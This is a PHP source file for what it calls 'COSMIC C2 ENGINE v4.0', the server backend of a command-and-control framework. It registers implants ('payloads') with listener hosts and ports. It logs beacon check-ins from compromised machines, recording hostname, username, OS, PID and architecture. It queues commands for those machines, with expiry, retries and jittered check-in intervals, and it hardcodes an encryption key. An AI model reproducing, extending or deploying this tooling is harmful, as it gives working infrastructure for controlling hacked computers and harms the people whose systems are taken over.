<?php
/**
 * COSMIC C2 ENGINE v4.0 – INDUSTRIAL‑GRADE COMMAND & CONTROL
 * Features:
 *   - AES‑256 encrypted beacons (optional)
 *   - Payload heartbeat with jitter
 *   - Task expiry and retries
 *   - Payload grouping and tags
 *   - Quick nav integration (active payloads list)
 */
class C2Engine {
    private $db;
    private $dbPath;
    private $encryptionKey = 'COSMIC-C2-ENCRYPTION-KEY-2026'; // Change in production
    
    public function __construct() {
        $this->dbPath = dirname(__DIR__, 2) . '/data/c2/c2.db';
        $this->connect();
        $this->migrate();
    }
    
    private function connect() {
        try {
            $this->db = new SQLite3($this->dbPath);
            $this->db->busyTimeout(5000);
            $this->db->exec('PRAGMA foreign_keys = ON;');
        } catch (Exception $e) {
            error_log('C2 Database connection failed: ' . $e->getMessage());
            throw new Exception('C2 Database connection failed.');
        }
    }
    
    private function migrate() {
        // Payloads table with additional columns
        $this->db->exec("CREATE TABLE IF NOT EXISTS payloads (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            uuid TEXT UNIQUE NOT NULL,
            name TEXT,
            type TEXT,
            platform TEXT,
            lhost TEXT,
            lport INTEGER,
            filename TEXT,
            hash_sha256 TEXT,
            created_at INTEGER,
            last_seen INTEGER,
            heartbeat_interval INTEGER DEFAULT 60,
            jitter INTEGER DEFAULT 30,
            encryption_enabled INTEGER DEFAULT 0,
            group_name TEXT DEFAULT '',
            tags TEXT DEFAULT '',
            note TEXT DEFAULT '',
            status TEXT DEFAULT 'active'
        )");
        
        // Beacons table (unchanged but with encryption flag)
        $this->db->exec("CREATE TABLE IF NOT EXISTS beacons (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            payload_uuid TEXT NOT NULL,
            ip TEXT,
            external_ip TEXT DEFAULT '',
            country TEXT DEFAULT '',
            user_agent TEXT,
            hostname TEXT,
            username TEXT,
            os_info TEXT,
            pid INTEGER,
            architecture TEXT,
            beacon_time INTEGER,
            encrypted INTEGER DEFAULT 0
        )");
        
        // Tasks table with expiry and retries
        $this->db->exec("CREATE TABLE IF NOT EXISTS tasks (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            payload_uuid TEXT NOT NULL,
            command TEXT NOT NULL,
            type TEXT DEFAULT 'command',
            status TEXT DEFAULT 'pending',
            created_at INTEGER,
            expires_at INTEGER,
            retries INTEGER DEFAULT 0,
            max_retries INTEGER DEFAULT 3,
            executed_at INTEGER,
            result TEXT
        )");
        
        // Listeners table (unchanged)
        $this->db->exec("CREATE TABLE IF NOT EXISTS listeners (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            name TEXT NOT NULL,
            protocol TEXT DEFAULT 'tcp',
            lhost TEXT NOT NULL,
            lport INTEGER NOT NULL,
            pid INTEGER,
            status TEXT DEFAULT 'stopped',
            auto_restart INTEGER DEFAULT 0,
            created_at INTEGER,
            updated_at INTEGER
        )");
        
        // C2 stats table
        $this->db->exec("CREATE TABLE IF NOT EXISTS c2_stats (
            key TEXT PRIMARY KEY,
            value TEXT,
            updated_at INTEGER
        )");
        
        $this->initStat('total_payloads', '0');
        $this->initStat('total_beacons', '0');
        $this->initStat('total_tasks', '0');
    }
    
    private function initStat($key, $default) {
        $stmt = $this->db->prepare("INSERT OR IGNORE INTO c2_stats (key, value, updated_at) VALUES (:key, :val, :time)");
        if (!$stmt) return;
        $stmt->bindValue(':key', $key, SQLITE3_TEXT);
        $stmt->bindValue(':val', $default, SQLITE3_TEXT);
        $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
        $stmt->execute();
    }
    
    // ========== ENCRYPTION HELPERS ==========
    private function encrypt($data) {
        if (!function_exists('openssl_encrypt')) return $data;
        $iv = random_bytes(16);
        $encrypted = openssl_encrypt($data, 'AES-256-CBC', $this->encryptionKey, OPENSSL_RAW_DATA, $iv);
        return base64_encode($iv . $encrypted);
    }
    
    private function decrypt($data) {
        if (!function_exists('openssl_decrypt')) return $data;
        $decoded = base64_decode($data);
        $iv = substr($decoded, 0, 16);
        $encrypted = substr($decoded, 16);
        return openssl_decrypt($encrypted, 'AES-256-CBC', $this->encryptionKey, OPENSSL_RAW_DATA, $iv);
    }
    
    // ========== PAYLOAD MANAGEMENT ==========
    public function registerPayload($data) {
        $uuid = $data['uuid'] ?? $this->generateUUID();
        $stmt = $this->db->prepare("
            INSERT INTO payloads 
            (uuid, name, type, platform, lhost, lport, filename, hash_sha256, created_at, status, 
             heartbeat_interval, jitter, encryption_enabled, group_name, tags, note)
            VALUES (:uuid, :name, :type, :platform, :lhost, :lport, :filename, :hash, :created, :status,
                    :heartbeat, :jitter, :encrypt, :group, :tags, :note)
        ");
        if (!$stmt) return false;
        $stmt->bindValue(':uuid', $uuid, SQLITE3_TEXT);
        $stmt->bindValue(':name', $data['name'] ?? 'Unnamed', SQLITE3_TEXT);
        $stmt->bindValue(':type', $data['type'] ?? 'unknown', SQLITE3_TEXT);
        $stmt->bindValue(':platform', $data['platform'] ?? 'generic', SQLITE3_TEXT);
        $stmt->bindValue(':lhost', $data['lhost'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':lport', $data['lport'] ?? 0, SQLITE3_INTEGER);
        $stmt->bindValue(':filename', $data['filename'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':hash', $data['hash'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':created', time(), SQLITE3_INTEGER);
        $stmt->bindValue(':status', $data['status'] ?? 'active', SQLITE3_TEXT);
        $stmt->bindValue(':heartbeat', $data['heartbeat'] ?? 60, SQLITE3_INTEGER);
        $stmt->bindValue(':jitter', $data['jitter'] ?? 30, SQLITE3_INTEGER);
        $stmt->bindValue(':encrypt', $data['encryption_enabled'] ?? 0, SQLITE3_INTEGER);
        $stmt->bindValue(':group', $data['group'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':tags', $data['tags'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':note', $data['note'] ?? '', SQLITE3_TEXT);
        $stmt->execute();
        $this->updateStat('total_payloads', '+1');
        return $uuid;
    }
    
    public function getActivePayloads() {
        $res = $this->db->query("SELECT * FROM payloads WHERE status = 'active' ORDER BY last_seen DESC");
        $out = [];
        while ($row = $res->fetchArray(SQLITE3_ASSOC)) {
            $out[] = $row;
        }
        return $out;
    }
    
    public function getPayload($uuid) {
        $stmt = $this->db->prepare("SELECT * FROM payloads WHERE uuid = :uuid");
        $stmt->bindValue(':uuid', $uuid, SQLITE3_TEXT);
        $res = $stmt->execute();
        return $res->fetchArray(SQLITE3_ASSOC);
    }
    
    // ========== BEACON HANDLING ==========
    public function beacon($payloadUuid, $info) {
        // Check if payload exists and is active
        $payload = $this->getPayload($payloadUuid);
        if (!$payload || $payload['status'] !== 'active') {
            return ['error' => 'Payload not active'];
        }
        
        // Update last_seen
        $stmt = $this->db->prepare("UPDATE payloads SET last_seen = :time WHERE uuid = :uuid");
        $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
        $stmt->bindValue(':uuid', $payloadUuid, SQLITE3_TEXT);
        $stmt->execute();
        
        // Determine if encryption was used
        $encrypted = isset($info['encrypted']) ? (int)$info['encrypted'] : 0;
        
        // Insert beacon record
        $stmt = $this->db->prepare("
            INSERT INTO beacons 
            (payload_uuid, ip, external_ip, country, user_agent, hostname, username, os_info, pid, architecture, beacon_time, encrypted)
            VALUES (:uuid, :ip, :ext_ip, :country, :ua, :hostname, :username, :os, :pid, :arch, :time, :enc)
        ");
        if (!$stmt) return [];
        $stmt->bindValue(':uuid', $payloadUuid, SQLITE3_TEXT);
        $stmt->bindValue(':ip', $info['ip'] ?? $_SERVER['REMOTE_ADDR'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':ext_ip', $info['external_ip'] ?? $this->getExternalIP(), SQLITE3_TEXT);
        $stmt->bindValue(':country', $info['country'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':ua', $info['user_agent'] ?? $_SERVER['HTTP_USER_AGENT'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':hostname', $info['hostname'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':username', $info['username'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':os', $info['os_info'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':pid', $info['pid'] ?? 0, SQLITE3_INTEGER);
        $stmt->bindValue(':arch', $info['architecture'] ?? '', SQLITE3_TEXT);
        $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
        $stmt->bindValue(':enc', $encrypted, SQLITE3_INTEGER);
        $stmt->execute();
        
        $this->updateStat('total_beacons', '+1');
        
        // Get pending tasks (not expired)
        $tasks = $this->getPendingTasks($payloadUuid);
        
        // Calculate next beacon interval with jitter
        $interval = $payload['heartbeat_interval'] + rand(-$payload['jitter'], $payload['jitter']);
        if ($interval < 10) $interval = 10;
        
        return [
            'status' => 'ok',
            'tasks' => $tasks,
            'next_interval' => $interval,
            'server_time' => time()
        ];
    }
    
    public function getBeacons($payloadUuid = null, $limit = 50) {
        $sql = "SELECT * FROM beacons";
        $params = [];
        if ($payloadUuid) {
            $sql .= " WHERE payload_uuid = :uuid";
            $params[':uuid'] = $payloadUuid;
        }
        $sql .= " ORDER BY beacon_time DESC LIMIT :limit";
        $stmt = $this->db->prepare($sql);
        if (!$stmt) return [];
        if ($payloadUuid) $stmt->bindValue(':uuid', $payloadUuid, SQLITE3_TEXT);
        $stmt->bindValue(':limit', $limit, SQLITE3_INTEGER);
        $res = $stmt->execute();
        $out = [];
        while ($row = $res->fetchArray(SQLITE3_ASSOC)) {
            $out[] = $row;
        }
        return $out;
    }
    
    // ========== TASK MANAGEMENT WITH EXPIRY ==========
    public function addTask($payloadUuid, $command, $type = 'command', $expiresIn = 3600) {
        $stmt = $this->db->prepare("
            INSERT INTO tasks (payload_uuid, command, type, status, created_at, expires_at)
            VALUES (:uuid, :cmd, :type, 'pending', :time, :expires)
        ");
        if (!$stmt) return false;
        $stmt->bindValue(':uuid', $payloadUuid, SQLITE3_TEXT);
        $stmt->bindValue(':cmd', $command, SQLITE3_TEXT);
        $stmt->bindValue(':type', $type, SQLITE3_TEXT);
        $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
        $stmt->bindValue(':expires', time() + $expiresIn, SQLITE3_INTEGER);
        $stmt->execute();
        $taskId = $this->db->lastInsertRowID();
        $this->updateStat('total_tasks', '+1');
        return $taskId;
    }
    
    public function getPendingTasks($payloadUuid) {
        // Only tasks that are not expired and not completed
        $stmt = $this->db->prepare("
            SELECT id, command, type FROM tasks 
            WHERE payload_uuid = :uuid 
              AND status = 'pending'
              AND (expires_at IS NULL OR expires_at > :now)
            ORDER BY created_at ASC
        ");
        if (!$stmt) return [];
        $stmt->bindValue(':uuid', $payloadUuid, SQLITE3_TEXT);
        $stmt->bindValue(':now', time(), SQLITE3_INTEGER);
        $res = $stmt->execute();
        $tasks = [];
        while ($row = $res->fetchArray(SQLITE3_ASSOC)) {
            $tasks[] = $row;
        }
        return $tasks;
    }
    
    public function completeTask($taskId, $result) {
        $stmt = $this->db->prepare("
            UPDATE tasks SET status = 'completed', executed_at = :exec, result = :result
            WHERE id = :id
        ");
        if (!$stmt) return;
        $stmt->bindValue(':exec', time(), SQLITE3_INTEGER);
        $stmt->bindValue(':result', $result, SQLITE3_TEXT);
        $stmt->bindValue(':id', $taskId, SQLITE3_INTEGER);
        $stmt->execute();
    }
    
    public function getTasks($payloadUuid = null, $status = null) {
        $sql = "SELECT * FROM tasks";
        $where = [];
        $params = [];
        if ($payloadUuid) {
            $where[] = "payload_uuid = :uuid";
            $params[':uuid'] = $payloadUuid;
        }
        if ($status) {
            $where[] = "status = :status";
            $params[':status'] = $status;
        }
        if (!empty($where)) $sql .= " WHERE " . implode(' AND ', $where);
        $sql .= " ORDER BY created_at DESC";
        $stmt = $this->db->prepare($sql);
        if (!$stmt) return [];
        foreach ($params as $key => $val) {
            $stmt->bindValue($key, $val, SQLITE3_TEXT);
        }
        $res = $stmt->execute();
        $out = [];
        while ($row = $res->fetchArray(SQLITE3_ASSOC)) {
            $out[] = $row;
        }
        return $out;
    }
    
    // ========== STATISTICS ==========
    public function getStats() {
        $stats = [];
        $res = $this->db->query("SELECT * FROM c2_stats");
        while ($row = $res->fetchArray(SQLITE3_ASSOC)) {
            $stats[$row['key']] = $row['value'];
        }
        $stats['payloads_active'] = $this->db->querySingle("SELECT COUNT(*) FROM payloads WHERE status='active'");
        $stats['payloads_total'] = $this->db->querySingle("SELECT COUNT(*) FROM payloads");
        $stats['beacons_today'] = $this->db->querySingle("SELECT COUNT(*) FROM beacons WHERE beacon_time > " . (time() - 86400));
        $stats['tasks_pending'] = $this->db->querySingle("SELECT COUNT(*) FROM tasks WHERE status='pending' AND (expires_at IS NULL OR expires_at > " . time() . ")");
        $stats['tasks_completed'] = $this->db->querySingle("SELECT COUNT(*) FROM tasks WHERE status='completed'");
        return $stats;
    }
    
    private function updateStat($key, $delta) {
        $stmt = $this->db->prepare("
            INSERT INTO c2_stats (key, value, updated_at)
            VALUES (:key, :val, :time)
            ON CONFLICT(key) DO UPDATE SET 
                value = CASE 
                    WHEN :val LIKE '+%' THEN CAST(value AS INTEGER) + CAST(SUBSTR(:val,2) AS INTEGER)
                    WHEN :val LIKE '-%' THEN CAST(value AS INTEGER) - CAST(SUBSTR(:val,2) AS INTEGER)
                    ELSE :val
                END,
                updated_at = :time
        ");
        if (!$stmt) return;
        $stmt->bindValue(':key', $key, SQLITE3_TEXT);
        $stmt->bindValue(':val', $delta, SQLITE3_TEXT);
        $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
        $stmt->execute();
    }
    
    // ========== UTILITY ==========
    private function generateUUID() {
        return sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
            mt_rand(0, 0xffff), mt_rand(0, 0xffff),
            mt_rand(0, 0xffff),
            mt_rand(0, 0x0fff) | 0x4000,
            mt_rand(0, 0x3fff) | 0x8000,
            mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff)
        );
    }
    
    private function getExternalIP() {
        return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    }
}
